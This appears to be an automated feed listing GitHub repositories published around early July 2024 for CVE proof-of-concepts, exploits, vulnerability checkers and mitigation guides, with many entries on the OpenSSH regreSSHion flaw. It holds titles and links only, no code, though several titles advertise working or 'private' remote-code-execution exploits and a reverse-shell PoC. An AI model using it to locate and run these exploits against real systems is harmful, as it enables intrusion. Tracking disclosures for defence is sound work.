**CVE-2024-37081: Multiple Local Privilege Escalation in VMware vCenter Server** : [mbadanoiu/CVE-2024-37081](https://github.com/mbadanoiu/CVE-2024-37081) create time: 2024-07-06T18:29:13Z

**CVE-2024-22275: Partial File Read in VMware vCenter Server** : [mbadanoiu/CVE-2024-22275](https://github.com/mbadanoiu/CVE-2024-22275) create time: 2024-07-06T18:14:28Z

**CVE-2024-22274: Authenticated Remote Code Execution in VMware vCenter Server** : [mbadanoiu/CVE-2024-22274](https://github.com/mbadanoiu/CVE-2024-22274) create time: 2024-07-06T17:55:25Z

**Path traversal vulnerability in Splunk Enterprise on Windows** : [sardine-web/CVE-2024-36991](https://github.com/sardine-web/CVE-2024-36991) create time: 2024-07-06T17:15:39Z

**DO NOT FORK, DEPLOY, OR USE FOR ANYTHING BUT LEARNING. These requirements are vulnerable to CVE-2024-39689** : [roy-aladin/InfraTest](https://github.com/roy-aladin/InfraTest) create time: 2024-03-20T14:16:38Z

**no description** : [A-little-dragon/CVE-2024-39943-Exploit](https://github.com/A-little-dragon/CVE-2024-39943-Exploit) create time: 2024-07-06T17:06:25Z

**CVE-2024-36991: Path traversal that affects Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10.** : [th3gokul/CVE-2024-36991](https://github.com/th3gokul/CVE-2024-36991) create time: 2024-07-06T15:24:24Z

**no description** : [zt20xx/CVE-2023-48194](https://github.com/zt20xx/CVE-2023-48194) create time: 2024-07-06T12:37:56Z

**no description** : [zgimszhd61/CVE-2024-36401](https://github.com/zgimszhd61/CVE-2024-36401) create time: 2024-07-06T06:04:41Z

**Remote Code Execution (RCE) Vulnerability In Evaluating Property Name Expressions** : [Mr-xn/CVE-2024-36401](https://github.com/Mr-xn/CVE-2024-36401) create time: 2024-07-06T01:10:28Z

**Path Traversal On The “/Modules/Messaging/“ Endpoint In Splunk Enterprise On Windows** : [Mr-xn/CVE-2024-36991](https://github.com/Mr-xn/CVE-2024-36991) create time: 2024-07-06T01:00:57Z

**POC for CVE-2024-36991: This exploit will attempt to read Splunk /etc/passwd file.** : [bigb0x/CVE-2024-36991](https://github.com/bigb0x/CVE-2024-36991) create time: 2024-07-06T00:49:40Z

**Vulnerability remediation and mitigationCVE-2024-6387** : [azurejoga/CVE-2024-6387-how-to-fix](https://github.com/azurejoga/CVE-2024-6387-how-to-fix) create time: 2024-07-05T21:29:11Z

**no description** : [codeb0ss/CVE-2024-2122-PoC](https://github.com/codeb0ss/CVE-2024-2122-PoC) create time: 2024-07-05T21:19:18Z

**GNU IFUNC is the real culprit behind CVE-2024-3094** : [robertdfrench/ifuncd-up](https://github.com/robertdfrench/ifuncd-up) create time: 2024-07-05T18:36:16Z

**TeamCity RCE for Linux (CVE-2023-42793)** : [HusenjanDev/CVE-2023-42793](https://github.com/HusenjanDev/CVE-2023-42793) create time: 2024-07-05T17:39:25Z

**A POC to demonstrate CVE-2018-6574** : [athulmur/CVE-2018-6574](https://github.com/athulmur/CVE-2018-6574) create time: 2024-07-05T17:06:18Z

**Correção e Atualização do OpenSSH para CVE-2024-6387** : [dgicloud/patch_regreSSHion](https://github.com/dgicloud/patch_regreSSHion) create time: 2024-07-05T16:59:19Z

**CVE-2024-37770** : [k3ppf0r/CVE-2024-37770](https://github.com/k3ppf0r/CVE-2024-37770) create time: 2024-07-05T16:13:34Z

**该漏洞存在于 NtQueryInformationToken 函数中,特别是在处理AuthzBasepCopyoutInternalSecurityAttributes 函数时,该漏洞源于内核在操作对象时对锁定机制的不当管理,这一失误可能导致恶意实体意外提升权限。** : [Zombie-Kaiser/CVE-2024-30088-Windows-poc](https://github.com/Zombie-Kaiser/CVE-2024-30088-Windows-poc) create time: 2024-07-05T16:02:56Z

**Exploiter a Vulnerability detection and Exploitation tool for GeoServer Unauthenticated Remote Code Execution CVE-2024-36401.** : [RevoltSecurities/CVE-2024-36401](https://github.com/RevoltSecurities/CVE-2024-36401) create time: 2024-07-05T15:24:50Z

**no description** : [Ailenchick/CVE-2023-20945](https://github.com/Ailenchick/CVE-2023-20945) create time: 2024-07-05T15:03:40Z

**no description** : [Ailenchick/CVE-2023-20963](https://github.com/Ailenchick/CVE-2023-20963) create time: 2024-07-05T15:02:07Z

**CVE-2024-6387 SSH finder** : [SiberianHacker/CVE-2024-6387-Finder](https://github.com/SiberianHacker/CVE-2024-6387-Finder) create time: 2024-07-05T15:15:41Z

**no description** : [puckiestyle/CVE-2023-27532-RCE-Only](https://github.com/puckiestyle/CVE-2023-27532-RCE-Only) create time: 2024-07-05T14:00:48Z

**CVE-2024-4577 Exploits** : [cybersagor/CVE-2024-4577](https://github.com/cybersagor/CVE-2024-4577) create time: 2024-07-05T12:47:44Z

**This script used for Linux systems to check version of openSSH** : [saberdhaouadi/OpenSSH_CVE2024_Checking](https://github.com/saberdhaouadi/OpenSSH_CVE2024_Checking) create time: 2024-07-05T12:06:04Z

**SSH EXPLOIT BYPASS AUTH SSH** : [DANO-AMP/CVE-2024-3094](https://github.com/DANO-AMP/CVE-2024-3094) create time: 2024-07-05T12:02:10Z

**no description** : [imv7/CVE-2024-6387](https://github.com/imv7/CVE-2024-6387) create time: 2024-07-05T11:18:38Z

**Quick regreSSHion checker (based on software version) for nuclei CVE-2024-6387** : [sardine-web/CVE-2024-6387-template](https://github.com/sardine-web/CVE-2024-6387-template) create time: 2024-07-05T11:05:26Z

**Best house rental management system Local file contains vulnerability** : [KRookieSec/CVE-2024-39210](https://github.com/KRookieSec/CVE-2024-39210) create time: 2024-07-05T08:01:22Z

**CVE-2024-6387-Check es una herramienta ligera y eficiente diseñada para identificar servidores que ejecutan versiones vulnerables de OpenSSH, específicamente el fallo de seguridad conocido como regreSSHion (CVE-2024-6387). Este script facilita el análisis rápido de múltiples direcciones IP, nombres de dominio y rangos de red CIDR.** : [Segurmatica/CVE-2024-6387-CHECK](https://github.com/Segurmatica/CVE-2024-6387-CHECK) create time: 2024-07-05T07:51:04Z

**Sample project that uses VEX to supress CVE-2024-29415.** : [felipecruz91/node-ip-vex](https://github.com/felipecruz91/node-ip-vex) create time: 2024-07-05T07:50:29Z

**no description** : [athulmur/CVE-2018-6574](https://github.com/athulmur/CVE-2018-6574) create time: 2024-07-05T06:48:11Z

**CVE-2024-39943 rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).** : [truonghuuphuc/CVE-2024-39943-Poc](https://github.com/truonghuuphuc/CVE-2024-39943-Poc) create time: 2024-07-05T06:46:34Z

**CVE-2024-4040 PoC** : [entroychang/CVE-2024-4040](https://github.com/entroychang/CVE-2024-4040) create time: 2024-07-05T05:46:56Z

**HASSH fingerprints for identifying OpenSSH servers potentially vulnerable to CVE-2024-6387 (regreSSHion).** : [0x4D31/cve-2024-6387_hassh](https://github.com/0x4D31/cve-2024-6387_hassh) create time: 2024-07-05T02:46:57Z

**POC** : [Niuwoo/CVE-2024-36401](https://github.com/Niuwoo/CVE-2024-36401) create time: 2024-07-05T03:02:30Z

**CVE-2024-29972 - Exploit** : [codeb0ss/CVE-2024-29972-PoC](https://github.com/codeb0ss/CVE-2024-29972-PoC) create time: 2024-07-04T21:31:07Z

**It Was Discovered That OpenSSH Incorrectly Handled Signal Management. A Remote Attacker Could Use This Issue To Bypass Authentication And Remotely Access Systems WithOut Proper Credentials.** : [sardine-web/CVE-2024-6387_Check](https://github.com/sardine-web/CVE-2024-6387_Check) create time: 2024-07-04T21:20:26Z

**no description** : [aditibv/MOVEit-CVE-2023-34362-](https://github.com/aditibv/MOVEit-CVE-2023-34362-) create time: 2024-07-04T21:13:48Z

**no description** : [iamz24/CVE-2021-3493_CVE-2022-3357](https://github.com/iamz24/CVE-2021-3493_CVE-2022-3357) create time: 2024-07-04T17:29:28Z

**no description** : [MehdiBoukhobza/SandBox_CVE-2021-23358](https://github.com/MehdiBoukhobza/SandBox_CVE-2021-23358) create time: 2024-07-04T14:55:10Z

**rewrited SSH Exploit for CVE-2024-6387 (regreSSHion)** : [4lxprime/regreSSHive](https://github.com/4lxprime/regreSSHive) create time: 2024-07-04T14:34:21Z

**no description** : [lala-amber/CVE-2024-6387](https://github.com/lala-amber/CVE-2024-6387) create time: 2024-07-04T13:28:53Z

**POC for CVE-2024-36401. This POC will attempt to establish a reverse shell to the vlun targets.** : [bigb0x/CVE-2024-36401](https://github.com/bigb0x/CVE-2024-36401) create time: 2024-07-04T13:19:47Z

**no description** : [invaderslabs/regreSSHion-CVE-2024-6387-](https://github.com/invaderslabs/regreSSHion-CVE-2024-6387-) create time: 2024-07-04T13:15:54Z

**no description** : [xzx482/CVE-2024-1086](https://github.com/xzx482/CVE-2024-1086) create time: 2024-07-04T10:51:35Z

**CVE-2024-39211** : [temka1603/CVE-2024-39211](https://github.com/temka1603/CVE-2024-39211) create time: 2024-07-04T09:24:34Z

**CVE-2017-12617** : [yZ1337/CVE-2017-12617](https://github.com/yZ1337/CVE-2017-12617) create time: 2024-07-04T07:23:39Z

**The exploit is tested on Ubuntu 22.04** : [AleksPwn/CVE-2022-37706](https://github.com/AleksPwn/CVE-2022-37706) create time: 2024-07-04T07:42:37Z

**no description** : [Redfox-Secuirty/Digisol-DG--GR1321-s-Password-Storage-in-Plaintext--CVE-2024-4232](https://github.com/Redfox-Secuirty/Digisol-DG--GR1321-s-Password-Storage-in-Plaintext--CVE-2024-4232) create time: 2024-07-04T06:30:19Z

**no description** : [Redfox-Secuirty/Digisol-DG--GR1321-s-Password-Policy-Bypass--CVE--2024-2257](https://github.com/Redfox-Secuirty/Digisol-DG--GR1321-s-Password-Policy-Bypass--CVE--2024-2257) create time: 2024-07-04T06:23:27Z

**no description** : [Redfox-Secuirty/Digisol-DG-GR1321-s-Improper-Access-Control--CVE-2024--4231](https://github.com/Redfox-Secuirty/Digisol-DG-GR1321-s-Improper-Access-Control--CVE-2024--4231) create time: 2024-07-04T06:10:59Z

**no description** : [sms2056/CVE-2024-6387](https://github.com/sms2056/CVE-2024-6387) create time: 2024-07-04T06:10:56Z

**no description** : [Redfox-Secuirty/Asus-RT--N12-B1-s-Privilege-Escalation--CVE--2024--28326](https://github.com/Redfox-Secuirty/Asus-RT--N12-B1-s-Privilege-Escalation--CVE--2024--28326) create time: 2024-07-04T06:03:23Z

**no description** : [Redfox-Secuirty/Asus-RT--N12-B1-s-Insecure-Credential-Storage-CVE--2024--28327](https://github.com/Redfox-Secuirty/Asus-RT--N12-B1-s-Insecure-Credential-Storage-CVE--2024--28327) create time: 2024-07-04T05:55:13Z

**no description** : [Redfox-Secuirty/Asus-RT--N12-B1-s-CSV-Injection-CVE--2024--28328](https://github.com/Redfox-Secuirty/Asus-RT--N12-B1-s-CSV-Injection-CVE--2024--28328) create time: 2024-07-04T05:49:51Z

**no description** : [Redfox-Secuirty/Asus-RT-N12-B1-s-Credentials-Stored-in-Cleartext--CVE--2024--28325](https://github.com/Redfox-Secuirty/Asus-RT-N12-B1-s-Credentials-Stored-in-Cleartext--CVE--2024--28325) create time: 2024-07-04T05:44:55Z

**CVE-2024-6387-OpenSSH-Vulnerability-Checker** : [turbobit/CVE-2024-6387-OpenSSH-Vulnerability-Checker](https://github.com/turbobit/CVE-2024-6387-OpenSSH-Vulnerability-Checker) create time: 2024-07-04T03:56:08Z

**CVE-2024-6387_Check 是一款轻量级、高效的工具,旨在识别运行易受攻击的 OpenSSH 版本的服务器,专门针对最近发现的regreSSHion漏洞 (CVE-2024-6387)。此脚本有助于快速扫描多个 IP 地址、域名和 CIDR 网络范围,以检测潜在漏洞并确保您的基础设施安全。** : [JackSparrowhk/ssh-CVE-2024-6387-poc](https://github.com/JackSparrowhk/ssh-CVE-2024-6387-poc) create time: 2024-07-04T03:51:16Z

**no description** : [Typical0day/CVE-2021-4034](https://github.com/Typical0day/CVE-2021-4034) create time: 2024-07-04T02:33:57Z

**no description** : [Typical0day/CVE-2021-3156](https://github.com/Typical0day/CVE-2021-3156) create time: 2024-07-04T02:29:08Z

**A cross-site scripting (XSS) vulnerability in the Backend Theme. Management module of Z-BlogPHP v1.7.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.** : [5r1an/CVE-2024-39203](https://github.com/5r1an/CVE-2024-39203) create time: 2024-07-04T02:30:17Z

**CVE-2024-39844 (ZNC < 1.9.1 modtcl RCE)** : [ph1ns/CVE-2024-39844](https://github.com/ph1ns/CVE-2024-39844) create time: 2024-07-03T23:27:25Z

**no description** : [0xhunster/CVE-2024-34102](https://github.com/0xhunster/CVE-2024-34102) create time: 2024-07-03T21:47:28Z

**no description** : [jocker2410/CVE-2024-6387_poc](https://github.com/jocker2410/CVE-2024-6387_poc) create time: 2024-07-03T15:51:16Z

**CVE-2024-4577 EXP** : [charis3306/CVE-2024-4577](https://github.com/charis3306/CVE-2024-4577) create time: 2024-07-03T15:30:52Z

**no description** : [t3rry327/cve-2024-6387-poc](https://github.com/t3rry327/cve-2024-6387-poc) create time: 2024-07-03T13:21:10Z

**Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC) BlueBorne - Proof of Concept - Unarmed/Unweaponized - DoS (Crash) only** : [sgxgsx/blueborne-CVE-2017-1000251](https://github.com/sgxgsx/blueborne-CVE-2017-1000251) create time: 2024-07-03T12:14:00Z

**no description** : [AmbroseCdMeng/CVE-2024-32002-Hook](https://github.com/AmbroseCdMeng/CVE-2024-32002-Hook) create time: 2024-07-03T12:11:17Z

**no description** : [AmbroseCdMeng/CVE-2024-32002](https://github.com/AmbroseCdMeng/CVE-2024-32002) create time: 2024-07-03T12:00:41Z

**no description** : [CognisysGroup/CVE-2024-6387-Checker](https://github.com/CognisysGroup/CVE-2024-6387-Checker) create time: 2024-07-02T21:47:02Z

**利用 CVE-2024-0044 Android 权限提升下载任意目标App沙箱文件。** : [Re13orn/CVE-2024-0044-EXP](https://github.com/Re13orn/CVE-2024-0044-EXP) create time: 2024-07-03T10:29:06Z

**SentinelSSH is an advanced, high-performance SSH vulnerability scanner written in Go. It's specifically designed to detect the CVE-2024-6387 vulnerability in OpenSSH servers across various network environments.** : [harshinsecurity/sentinelssh](https://github.com/harshinsecurity/sentinelssh) create time: 2024-07-03T10:26:23Z

**Private exploit CVE-2024-5655 to Gitlab (Private repositories disclosure)** : [VulnResearcher/CVE-2024-5655-Gitlab-CSRF-GraphQL](https://github.com/VulnResearcher/CVE-2024-5655-Gitlab-CSRF-GraphQL) create time: 2024-07-03T08:52:48Z

**no description** : [Redfox-Secuirty/Unveiling-Moniker-Link-CVE-2024-21413-Navigating-the-Latest-Cybersecurity-Landscape](https://github.com/Redfox-Secuirty/Unveiling-Moniker-Link-CVE-2024-21413-Navigating-the-Latest-Cybersecurity-Landscape) create time: 2024-07-03T08:45:05Z

**SSH Exploit for CVE-2024-6387 : RCE in OpenSSH's server, on glibc-based Linux systems** : [Symbolexe/CVE-2024-6387](https://github.com/Symbolexe/CVE-2024-6387) create time: 2024-07-03T08:22:57Z

**git clone rce CVE-2024-30002** : [EQSTSeminar/git_rce](https://github.com/EQSTSeminar/git_rce) create time: 2024-07-03T08:01:39Z

**no description** : [carsonchan12345/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation](https://github.com/carsonchan12345/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation) create time: 2024-07-03T07:26:07Z

**CVE-2017-0144 (Eternal Blue) | CVE-2023-3881 | CVE-2011-2523** : [AnugiArrawwala/CVE-Research](https://github.com/AnugiArrawwala/CVE-Research) create time: 2024-07-03T06:30:54Z

**Targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems.** : [sxlmnwb/CVE-2024-6387](https://github.com/sxlmnwb/CVE-2024-6387) create time: 2024-07-03T06:08:32Z

**git clone rce CVE-2024-30002** : [EQSTSeminar/git_rce](https://github.com/EQSTSeminar/git_rce) create time: 2024-07-03T05:58:44Z

**PoC Exploit for CVE-2024-5084** : [WOOOOONG/CVE-2024-5084](https://github.com/WOOOOONG/CVE-2024-5084) create time: 2024-07-03T04:24:43Z

**ASUS wifi router RCE vulnerability** : [BTtea/CVE-2018-14714-RCE_exploit](https://github.com/BTtea/CVE-2018-14714-RCE_exploit) create time: 2024-07-03T02:39:25Z

**CVE-2024-32002 git_clone_rce** : [EQSTSeminar/git_rce](https://github.com/EQSTSeminar/git_rce) create time: 2024-07-03T02:13:09Z

**CVE-2023-23752 Unauthenticated Information Disclosure Showcase Using Devvortex From HTB.** : [0x0jr/HTB-Devvortex-CVE-2023-2375-PoC](https://github.com/0x0jr/HTB-Devvortex-CVE-2023-2375-PoC) create time: 2024-07-02T23:50:31Z

**Private exploit for Cisco Nexus giving RCE** : [Blootus/CVE-2024-20399-Cisco-RCE](https://github.com/Blootus/CVE-2024-20399-Cisco-RCE) create time: 2024-07-02T23:40:49Z

**regreSSHion vulnerability in OpenSSH CVE-2024-6387 Testing Script** : [grupooruss/CVE-2024-6387-Tester](https://github.com/grupooruss/CVE-2024-6387-Tester) create time: 2024-07-02T21:16:45Z

**no description** : [EkaterinaMarchetti/CVE-2024-6387-regreSSHion-Checker](https://github.com/EkaterinaMarchetti/CVE-2024-6387-regreSSHion-Checker) create time: 2024-07-02T21:13:45Z

**no description** : [edsonjt81/CVE-2024-6387_Check](https://github.com/edsonjt81/CVE-2024-6387_Check) create time: 2024-07-02T20:35:53Z

**no description** : [BrandonLynch2402/cve-2024-6387-nuclei-template](https://github.com/BrandonLynch2402/cve-2024-6387-nuclei-template) create time: 2024-07-02T20:19:12Z

**Quickly identifies servers vulnerable to OpenSSH 'regreSSHion' (CVE-2024-6387).** : [xonoxitron/regreSSHion-checker](https://github.com/xonoxitron/regreSSHion-checker) create time: 2024-07-02T18:59:54Z

**CVE-2024-6387-Check is a streamlined and efficient tool created to detect servers operating on vulnerable versions of OpenSSH.** : [RickGeex/CVE-2024-6387-Checker](https://github.com/RickGeex/CVE-2024-6387-Checker) create time: 2024-07-02T18:46:24Z

**PoC - Remote Unauthenticated Code Execution Vulnerability in OpenSSH server (CVE-2024-6387)** : [l0n3m4n/CVE-2024-6387](https://github.com/l0n3m4n/CVE-2024-6387) create time: 2024-07-02T18:32:46Z

**Test_CVE-2024-6387 is a lightweight, efficient tool designed to identify servers running vulnerable versions of OpenSSH** : [n1cks0n/Test_CVE-2024-6387](https://github.com/n1cks0n/Test_CVE-2024-6387) create time: 2024-07-02T18:30:28Z

**examlpe poc of CVE-2024-4836_Check** : [sleep46/CVE-2024-4836_Check](https://github.com/sleep46/CVE-2024-4836_Check) create time: 2024-07-02T17:17:13Z

**Spirit - Network Pentest Tools CVE-2024-6387** : [theaog/spirit](https://github.com/theaog/spirit) create time: 2022-05-25T00:13:18Z

**CVE-2024-6387 : Vulnerability Detectetion tool Remote Unauthenticated Code Execution in OpenSSH Server** : [th3gokul/CVE-2024-6387](https://github.com/th3gokul/CVE-2024-6387) create time: 2024-07-02T17:04:52Z

**no description** : [MrR0b0t19/CVE-2024-6387-Exploit-POC](https://github.com/MrR0b0t19/CVE-2024-6387-Exploit-POC) create time: 2024-07-02T16:34:12Z

**no description** : [dawnl3ss/CVE-2024-6387](https://github.com/dawnl3ss/CVE-2024-6387) create time: 2024-07-02T15:13:33Z

**开箱即用的AK47** : [no-one-sec/CVE-2024-6387](https://github.com/no-one-sec/CVE-2024-6387) create time: 2024-07-02T15:13:09Z

**CVE-2024-6387 (regreSSHion) Exploit (PoC), a vulnerability in OpenSSH's server (sshd) on glibc-based Linux systems.** : [xonoxitron/regreSSHion](https://github.com/xonoxitron/regreSSHion) create time: 2024-07-02T14:41:43Z

**A bash script for nmap to scan for vulnerable machines in regards to the latest CVE-2024-6387** : [xristos8574/regreSSHion-nmap-scanner](https://github.com/xristos8574/regreSSHion-nmap-scanner) create time: 2024-07-02T13:50:47Z

**no description** : [N00BIER/CVE-2023-35985](https://github.com/N00BIER/CVE-2023-35985) create time: 2024-07-02T12:50:59Z

**no description** : [AmbroseCdMeng/CVE-2024-32002](https://github.com/AmbroseCdMeng/CVE-2024-32002) create time: 2024-07-02T13:02:50Z

**CVE-2024-6387 with auto ip scanner and auto expliot** : [AiGptCode/ssh_exploiter_CVE-2024-6387](https://github.com/AiGptCode/ssh_exploiter_CVE-2024-6387) create time: 2024-07-02T12:57:35Z

**no description** : [ACHUX21/checker-CVE-2024-6387](https://github.com/ACHUX21/checker-CVE-2024-6387) create time: 2024-07-02T12:48:27Z

**Test For CVE-2017–7921;** : [kooroshsanaei/HikVision-CVE-2017-7921](https://github.com/kooroshsanaei/HikVision-CVE-2017-7921) create time: 2024-07-02T11:47:35Z

**cve-2024-6387_AImade** : [hssmo/cve-2024-6387_AImade](https://github.com/hssmo/cve-2024-6387_AImade) create time: 2024-07-02T12:24:25Z

**no description** : [devarshishimpi/CVE-2024-6387-Check](https://github.com/devarshishimpi/CVE-2024-6387-Check) create time: 2024-07-02T11:55:39Z

**no description** : [raymontag/CVE-2019-2215](https://github.com/raymontag/CVE-2019-2215) create time: 2024-07-02T10:35:30Z

**Mitigation Guide for CVE-2024-6387 in OpenSSH** : [zenzue/CVE-2024-6387-Mitigation](https://github.com/zenzue/CVE-2024-6387-Mitigation) create time: 2024-07-02T11:08:40Z

**openssh-cve-2024-6387.sh** : [rumochnaya/openssh-cve-2024-6387.sh](https://github.com/rumochnaya/openssh-cve-2024-6387.sh) create time: 2024-07-02T11:05:07Z

**An Ansible Playbook to mitigate the risk of RCE (CVE-2024-6387) until platforms update OpenSSH to a non-vulnerable version.** : [DanWiseProgramming/CVE-2024-6387-Mitigation-Ansible-Playbook](https://github.com/DanWiseProgramming/CVE-2024-6387-Mitigation-Ansible-Playbook) create time: 2024-07-02T10:34:17Z

**no description** : [k4t3pr0/CVE-2024-6387-POC](https://github.com/k4t3pr0/CVE-2024-6387-POC) create time: 2024-07-02T10:05:43Z

**Private x64 RCE exploit for CVE-2024-6387 [02.07.2024] from exploit.in** : [PrincipalAnthony/CVE-2024-6387-Updated-x64bit](https://github.com/PrincipalAnthony/CVE-2024-6387-Updated-x64bit) create time: 2024-07-02T09:45:04Z

**This Go program scans targets for CVE-2024-6387 in OpenSSH, categorizing servers by vulnerability status and port availability.** : [SecWithMoh/CVE-2024-6387](https://github.com/SecWithMoh/CVE-2024-6387) create time: 2024-07-02T09:41:40Z

**Grafana Decryptor for CVE-2021-43798** : [Sic4rio/Grafana-Decryptor-for-CVE-2021-43798](https://github.com/Sic4rio/Grafana-Decryptor-for-CVE-2021-43798) create time: 2024-07-02T08:43:45Z

**CVE-2024-6387-nmap** : [paradessia/CVE-2024-6387-nmap](https://github.com/paradessia/CVE-2024-6387-nmap) create time: 2024-07-02T08:19:55Z

**Script for checking CVE-2024-6387 (regreSSHion)** : [shamo0/CVE-2024-6387_PoC](https://github.com/shamo0/CVE-2024-6387_PoC) create time: 2024-07-02T08:13:23Z

**Used to detect ssh servers vulnerable to CVE-2024-6387. Shameless robbery from https://github.com/bigb0x/CVE-2024-6387 using ChatGPT to translate the code to PHP.** : [CiderAndWhisky/regression-scanner](https://github.com/CiderAndWhisky/regression-scanner) create time: 2024-07-02T07:42:46Z

**CVE-2024-21006 exp** : [lightr3d/CVE-2024-21006_jar](https://github.com/lightr3d/CVE-2024-21006_jar) create time: 2024-07-02T06:25:14Z

**CVE-2024-6387-nmap** : [paradessia/CVE-2024-6387-nmap](https://github.com/paradessia/CVE-2024-6387-nmap) create time: 2024-07-02T07:03:21Z

**no description** : [oliferFord/CVE-2024-6387-SSH-RCE](https://github.com/oliferFord/CVE-2024-6387-SSH-RCE) create time: 2024-07-02T06:54:54Z

**This Python script exploits a remote code execution vulnerability (CVE-2024-6387) in OpenSSH.** : [d0rb/CVE-2024-6387](https://github.com/d0rb/CVE-2024-6387) create time: 2024-07-02T06:53:35Z

**This script, created by R4Tw1z, is designed to scan IP addresses to check if they are running a potentially vulnerable version of OpenSSH. The tool leverages multi-threading to optimize scanning performance and handle multiple IP addresses concurrently.** : [R4Tw1z/CVE-2024-6387](https://github.com/R4Tw1z/CVE-2024-6387) create time: 2024-07-02T06:40:09Z

**RCE OpenSSH CVE-2024-6387 Check** : [HadesNull123/CVE-2024-6387_Check](https://github.com/HadesNull123/CVE-2024-6387_Check) create time: 2024-07-02T05:21:29Z

**no description** : [th3gokul/CVE-2024-27292](https://github.com/th3gokul/CVE-2024-27292) create time: 2024-07-02T04:41:35Z

**CVE-2024-6387 exploit** : [thegenetic/CVE-2024-6387-exploit](https://github.com/thegenetic/CVE-2024-6387-exploit) create time: 2024-07-02T04:09:44Z

**no description** : [Mufti22/CVE-2024-6387-checkher](https://github.com/Mufti22/CVE-2024-6387-checkher) create time: 2024-07-02T03:48:37Z

**no description** : [ahlfors/CVE-2024-6387](https://github.com/ahlfors/CVE-2024-6387) create time: 2024-07-02T03:42:35Z

**no description** : [Maikefee/CVE-2024-6387_Check.py](https://github.com/Maikefee/CVE-2024-6387_Check.py) create time: 2024-07-02T03:27:03Z

**This is a POC I wrote for CVE-2024-6387** : [teamos-hub/regreSSHion](https://github.com/teamos-hub/regreSSHion) create time: 2024-07-02T02:54:05Z

**Recently, the OpenSSH maintainers released security updates to fix a critical vulnerability that could lead to unauthenticated remote code execution (RCE) with root privileges. This vulnerability, identified as CVE-2024-6387, resides in the OpenSSH server component (sshd), which is designed to listen for connections from client applications.** : [TAM-K592/CVE-2024-6387](https://github.com/TAM-K592/CVE-2024-6387) create time: 2024-07-02T02:51:37Z

**This is a POC I wrote for CVE-2024-6387** : [Yaimsputnik5/regreSSHion](https://github.com/Yaimsputnik5/regreSSHion) create time: 2024-07-02T02:45:34Z

**no description** : [muyuanlove/CVE-2024-6387fixshell](https://github.com/muyuanlove/CVE-2024-6387fixshell) create time: 2024-07-02T02:35:24Z

**no description** : [yya1233/CVE-2024-6387-Updated-SSH-RCE](https://github.com/yya1233/CVE-2024-6387-Updated-SSH-RCE) create time: 2024-07-02T02:09:17Z

**no description** : [zgimszhd61/cve-2024-6387-poc](https://github.com/zgimszhd61/cve-2024-6387-poc) create time: 2024-07-02T01:39:10Z

**OpenSSH CVE-2024-6387 Vulnerability Checker** : [betancour/OpenSSH-Vulnerability-test](https://github.com/betancour/OpenSSH-Vulnerability-test) create time: 2024-07-02T01:24:04Z

**SSH RCE PoC CVE-2024-6387** : [3yujw7njai/CVE-2024-6387](https://github.com/3yujw7njai/CVE-2024-6387) create time: 2024-07-02T01:08:05Z

**A PoC exploit for CVE-2024-29269 - Telesquare TLR-2005KSH Remote Code Execution (RCE)** : [K3ysTr0K3R/CVE-2024-29269-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-29269-EXPLOIT) create time: 2024-07-01T23:49:59Z

**CLI Tool to Check SSH Servers for Vulnerability to CVE-2024-6387** : [wiggels/regresshion-check](https://github.com/wiggels/regresshion-check) create time: 2024-07-01T22:53:32Z

**Bulk Scanning Tool for OpenSSH CVE-2024-6387, CVE-2006-5051 and CVE-2008-4109.** : [bigb0x/CVE-2024-6387](https://github.com/bigb0x/CVE-2024-6387) create time: 2024-07-01T20:45:53Z

**CVE-2024-6387_Check is a lightweight, efficient tool designed to identify servers running vulnerable versions of OpenSSH** : [xaitax/CVE-2024-6387_Check](https://github.com/xaitax/CVE-2024-6387_Check) create time: 2024-07-01T20:33:20Z

**no description** : [jack0we/CVE-2024-6387](https://github.com/jack0we/CVE-2024-6387) create time: 2024-07-01T18:28:25Z

**no description** : [kuffsit/check_cve_2024_6387](https://github.com/kuffsit/check_cve_2024_6387) create time: 2024-07-01T16:38:15Z

**CVE-2024-6387 for SSH RCE in Python [Update]** : [TrustResearcher/CVE-2024-6387-Updated-SSH-RCE](https://github.com/TrustResearcher/CVE-2024-6387-Updated-SSH-RCE) create time: 2024-07-01T15:30:56Z

**Case Study: SSHtranger Things (CVE-2019-6111, CVE-2019-6110) in Cisco SD-WAN** : [mbadanoiu/MAL-008](https://github.com/mbadanoiu/MAL-008) create time: 2024-07-01T14:07:20Z

**Reflected XSS in SOWA OPAC** : [kac89/CVE-2024-6050](https://github.com/kac89/CVE-2024-6050) create time: 2024-07-01T14:31:37Z

**no description** : [HPT-Intern-Task-Submission/CVE-2023-39361](https://github.com/HPT-Intern-Task-Submission/CVE-2023-39361) create time: 2024-07-01T13:36:42Z

**no description** : [passwa11/cve-2024-6387-poc](https://github.com/passwa11/cve-2024-6387-poc) create time: 2024-07-01T14:08:23Z

**SSHd cve-2024-6387-poc** : [FerasAlrimali/CVE-2024-6387-POC](https://github.com/FerasAlrimali/CVE-2024-6387-POC) create time: 2024-07-01T13:38:47Z

**CocoaPods RCE Vulnerability CVE-2024-38366** : [ReeFSpeK/CocoaPods-RCE](https://github.com/ReeFSpeK/CocoaPods-RCE) create time: 2024-06-28T13:11:28Z

**no description** : [RenukaSelvar/packages_providers_MediaProvider_CVE-2023-40127](https://github.com/RenukaSelvar/packages_providers_MediaProvider_CVE-2023-40127) create time: 2024-07-01T12:46:29Z

**no description** : [getdrive/CVE-2024-6387-PoC](https://github.com/getdrive/CVE-2024-6387-PoC) create time: 2024-07-01T12:51:18Z

**no description** : [shyrwall/cve-2024-6387-poc](https://github.com/shyrwall/cve-2024-6387-poc) create time: 2024-07-01T12:48:36Z

**no description** : [RenukaSelvar/platform_packages_providers_MediaProvider_CVE-2023-40127](https://github.com/RenukaSelvar/platform_packages_providers_MediaProvider_CVE-2023-40127) create time: 2024-07-01T12:23:48Z

**no description** : [saurabh2088/platform_packages_providers_MediaProvider_CVE-2023-40127](https://github.com/saurabh2088/platform_packages_providers_MediaProvider_CVE-2023-40127) create time: 2024-07-01T11:24:50Z

